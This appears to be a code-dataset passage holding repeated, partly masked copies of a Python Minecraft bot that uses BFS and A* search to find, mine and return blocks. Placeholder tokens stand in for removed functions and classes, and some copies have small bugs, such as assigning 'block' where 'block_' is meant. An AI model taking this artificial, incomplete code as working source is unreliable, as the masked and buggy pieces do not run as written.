_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass 
_ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = 
deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n\n\nclass _GenericBot:\n <docstring token>\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n <function token>\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. 
If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n <function token>\n <function token>\n <function token>\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n <function token>\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n <function token>\n <function token>\n <function token>\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n <function token>\n <function token>\n <function token>\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n <function token>\n <function token>\n <function token>\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():
            successor = state + dir_
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z)
                    and _get_mc().getBlock(successor) != _BEDROCK):
                rtn.append((successor, dir_, 1))
        return rtn


class _MineProblem(SearchProblem):
    """The problem of finding the block and mining it (not returning
    it)."""

    def __init__(self, imag_bot, block_loc, block_id):
        """Initialize the problem with an _ImaginaryBot.

        block_loc is a Vec3.
        """
        self._bot = imag_bot
        self._block_loc = deepcopy(block_loc)
        self._block_id = block_id

    def get_block_loc(self):
        """Return the block location."""
        return deepcopy(self._block_loc)

    def get_block_id(self):
        """Return the block it's trying to mine."""
        return self._block_id

    def getStartState(self):
        """Return the bot passed in."""
        return self._bot

    def isGoalState(self, state):
        """Return whether or not the bot has the block."""
        return state.contains(self._block_id)

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for action in state.get_legal_actions():
            successor = deepcopy(state)
            successor.take_action(action)
            rtn.append((successor, action, 1))
        return rtn


class _ReturnProblem(SearchProblem):
    """The problem of returning to the player. This does not place the block
    next to the player."""

    def __init__(self, imag_bot, block_, player_loc):
        """Initialize the problem with an _ImaginaryBot.

        block_ is a block id."""
        self._bot = imag_bot
        self._block = block_
        self._player_loc = player_loc

    def get_player_loc(self):
        """Return the player location."""
        return deepcopy(self._player_loc)

    def getStartState(self):
        """Return the bot passed in."""
        return self._bot

    def isGoalState(self, state):
        """Return whether or not the bot is next to the player."""
        diff = state.get_pos() - self._player_loc
        return (diff.y == 0 and (diff.x == 0 or diff.z == 0) and
                abs(diff.x) + abs(diff.z) == 2 and
                state.get_block(self._player_loc + diff / 2 +
                                _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER))

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for action in state.get_legal_actions(self._block):
            successor = deepcopy(state)
            successor.take_action(action)
            rtn.append((successor, action, 1))
        return rtn


<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
<function token>
<docstring token>
<import token>
<assignment token>
<class token>


class _GenericBot:
    <docstring token>
    <function token>
    <function token>

    def take_actions(self, actions, seconds=None):
        """Take these actions. If seconds is not None, sleep 'seconds'
        seconds between actions.
        """
        if not actions:
            return
        self.take_action(actions[0])
        for action in actions[1:]:
            if seconds is not None:
                sleep(seconds)
            self.take_action(action)
    <function token>
    <function token>
    <function token>

    def _get_block(self, pos):
        """Get the block at the position."""
        raise NotImplementedError
    <function token>

    def _move_down(self):
        """Move and mine the block below."""
        new_pos = self._pos + _Vec3(0, -1, 0)
        block_ = self._get_block(new_pos)
        if block_ != _WATER:
            self._add_to_inv(block_)
        self._move(new_pos)
    <function token>
    <function token>
    <function token>

    def _get_move_actions(self, exclude=None):
        """Return a list of legal movement actions.

        exclude is the block to exclude.
        """
        rtn = []
        # Check for moving up
        can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,
                                                                      _WATER}
        if can_move_up:
            if self._surrounded():
                rtn.append({'func': '_move',
                            'args': (self._pos + _Vec3(0, 1, 0),)})
            else:
                rtn.append({'func': '_move_up', 'args': (exclude,)})
        # Check for moving down
        hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))
        if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:
            rtn.append({'func': '_move_down'})
        # Check for side moves
        for dir_ in _adj_dirs():
            rtn.extend(self._side_moves(dir_, can_move_up))
        return rtn

    def _side_moves(self, dir_, can_move_up):
        """Return the list of side moves.

        dir_ is an adjacent direction.
        can_move_up is a boolean for whether or not the bot can move up.
        """
        rtn = []
        base_pos = self._pos + dir_
        base_block = self._get_block(base_pos)
        empty_blocks = {_AIR, _WATER}
        # Check if it can move up and over
        if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:
            for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:
                if self._get_block(base_pos + vert_dir) not in empty_blocks:
                    break
            else:
                rtn.append({'func': '_move',
                            'args': (base_pos + _Vec3(0, 1, 0),)})
        # Check if it can move to the side, possibly dropping down
        for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:
            if self._get_block(base_pos + vert_dir) not in empty_blocks:
                break
        else:
            pos = base_pos + _Vec3(0, -1, 0)
            for _ in xrange(_DROP_PLUS_1):
                block_ = self._get_block(pos)
                if block_ != _AIR:
                    if block_ != _LAVA:
                        rtn.append({'func': '_move',
                                    'args': (pos + _Vec3(0, 1, 0),)})
                    break
                pos.y -= 1
        return rtn
    <function token>
    <function token>
    <function token>

    def _can_place(self, loc):
        """Return whether or not the bot can place a block at that location
        independent of what it has in its inventory."""
        non_blocks = [_AIR, _WATER, _LAVA]
        player = [self._pos, self._pos + _Vec3(0, 1, 0)]
        for dir_ in _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]:
            new_loc = loc + dir_
            if new_loc not in player and self._get_block(new_loc
                    ) not in non_blocks:
                return True
        return False
    <function token>
    <function token>
    <function token>


class _ImaginaryBot(_GenericBot):
    """A bot used for finding paths that doesn't actually change blocks
    in the world."""

    def __init__(self, pos, inventory=None):
        """Create a new bot."""
        _GenericBot.__init__(self, pos, inventory)
        self._changes = {}

    def _set_block(self, pos, block_):
        """Set a block. block_ is the block id."""
        self._changes[deepcopy(pos)] = block_

    def _get_block(self, pos):
        """Get the block at the position."""
        if pos in self._changes:
            return self._changes[pos]
        else:
            return _get_mc().getBlock(pos)

    def get_block(self, pos):
        """The public version."""
        return self._get_block(pos)

    def __hash__(self):
        """Return the hash."""
        return hash(frozenset([self._pos] + _key_vals(self._inventory) +
                              _key_vals(self._changes)))


class Bot(_GenericBot):
    """The real bot.

    All vector arguments are Vec3s."""
    _BOT_BLOCK = block.IRON_BLOCK.id

    def __init__(self):
        """Create a bot next to the player."""
        pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)
        pos = _Vec3(pos.x, pos.y, pos.z)
        _GenericBot.__init__(self, pos)
        self._pos = pos
        self._move(self._pos)

    @staticmethod
    def destroy_all():
        """Destroy all bots within a small distance (in case I forget to
        destroy one)."""
        player_loc = _player_loc()
        minec = _get_mc()
        rad = 10
        for x in xrange(player_loc.x - rad, player_loc.x + rad):
            for y in xrange(player_loc.y - rad, player_loc.y + rad):
                for z in xrange(player_loc.z - rad, player_loc.z + rad):
                    if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:
                        minec.setBlock(x, y, z, _AIR)

    def destroy(self):
        """Set itself to air."""
        self._set_block(self._pos, _AIR)
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)

    def fetch(self, block_name):
        """Mine and return a block to the player."""
        imag_bot = _ImaginaryBot(self._pos, self._inventory)
        block_id = getattr(block, block_name).id
        block_loc = self._get_block_loc(block_id)
        mine_prob = _MineProblem(imag_bot, block_loc, block_id)
        mine_actions = astar(mine_prob, _mine_heuristic)
        self.take_actions(mine_actions, _DELAY)
        imag_bot = _ImaginaryBot(self._pos, self._inventory)
        player_loc = _player_loc()
        return_prob = _ReturnProblem(imag_bot, block_id, player_loc)
        return_actions = astar(return_prob, _return_heuristic)
        imag_bot.take_actions(return_actions)
        return_actions.append({'func': '_place',
                               'args': ((imag_bot.get_pos() + player_loc) / 2,),
                               'kwargs': {'block': block_id}})
        self.take_actions(return_actions, _DELAY)

    def _get_block_loc(self, block_id):
        """Return the location of the block."""
        find_prob = FindProblem(self._pos, block_id)
        dirs = bfs(find_prob)
        return self._pos + sum(dirs)

    def _set_block(self, pos, block_):
        """Place an actual block in the world.

        block_ is a block id."""
        _get_mc().setBlock(pos, block_)

    def _get_block(self, pos):
        """Get the block at the position."""
        return _get_mc().getBlock(pos)

    def _move(self, pos):
        """Move there, and set the appropriate blocks."""
        self._set_block(self._pos, _AIR)
        self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)
        self._set_block(pos, self._BOT_BLOCK)
        self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)
        self._pos = pos


class FindProblem(SearchProblem):
    """Problem for finding the location of a block in the world.

    A state in this problem is a location.
    """

    def __init__(self, start_loc, block_id):
        """Initialize."""
        self._start_loc = deepcopy(start_loc)
        self._block_id = block_id

    def getStartState(self):
        """Return the starting location."""
        return self._start_loc

    def isGoalState(self, state):
        """Return whether or not the block is at this location."""
        return _get_mc().getBlock(state) == self._block_id

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for dir_ in _all_dirs():
            successor = state + dir_
            if (successor.y <= _get_mc().getHeight(successor.x, successor.z)
                    and _get_mc().getBlock(successor) != _BEDROCK):
                rtn.append((successor, dir_, 1))
        return rtn


class _MineProblem(SearchProblem):
    """The problem of finding the block and mining it (not returning
    it)."""

    def __init__(self, imag_bot, block_loc, block_id):
        """Initialize the problem with an _ImaginaryBot.

        block_loc is a Vec3.
        """
        self._bot = imag_bot
        self._block_loc = deepcopy(block_loc)
        self._block_id = block_id

    def get_block_loc(self):
        """Return the block location."""
        return deepcopy(self._block_loc)

    def get_block_id(self):
        """Return the block it's trying to mine."""
        return self._block_id

    def getStartState(self):
        """Return the bot passed in."""
        return self._bot

    def isGoalState(self, state):
        """Return whether or not the bot has the block."""
        return state.contains(self._block_id)

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for action in state.get_legal_actions():
            successor = deepcopy(state)
            successor.take_action(action)
            rtn.append((successor, action, 1))
        return rtn


class _ReturnProblem(SearchProblem):
    """The problem of returning to the player. This does not place the block
    next to the player."""

    def __init__(self, imag_bot, block_, player_loc):
        """Initialize the problem with an _ImaginaryBot.

        block_ is a block id."""
        self._bot = imag_bot
        self._block = block_
        self._player_loc = player_loc

    def get_player_loc(self):
        """Return the player location."""
        return deepcopy(self._player_loc)

    def getStartState(self):
        """Return the bot passed in."""
        return self._bot

    def isGoalState(self, state):
        """Return whether or not the bot is next to the player."""
        diff = state.get_pos() - self._player_loc
        return (diff.y == 0 and (diff.x == 0 or diff.z == 0) and
                abs(diff.x) + abs(diff.z) == 2 and
                state.get_block(self._player_loc + diff / 2 +
                                _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER))

    def getSuccessors(self, state):
        """Return the successors."""
        rtn = []
        for action in state.get_legal_actions(self._block):
            successor = deepcopy(state)
            successor.take_action(action)
            rtn.append((successor, action, 1))
        return rtn


<function token>
<function token>
<function token>
<function token>
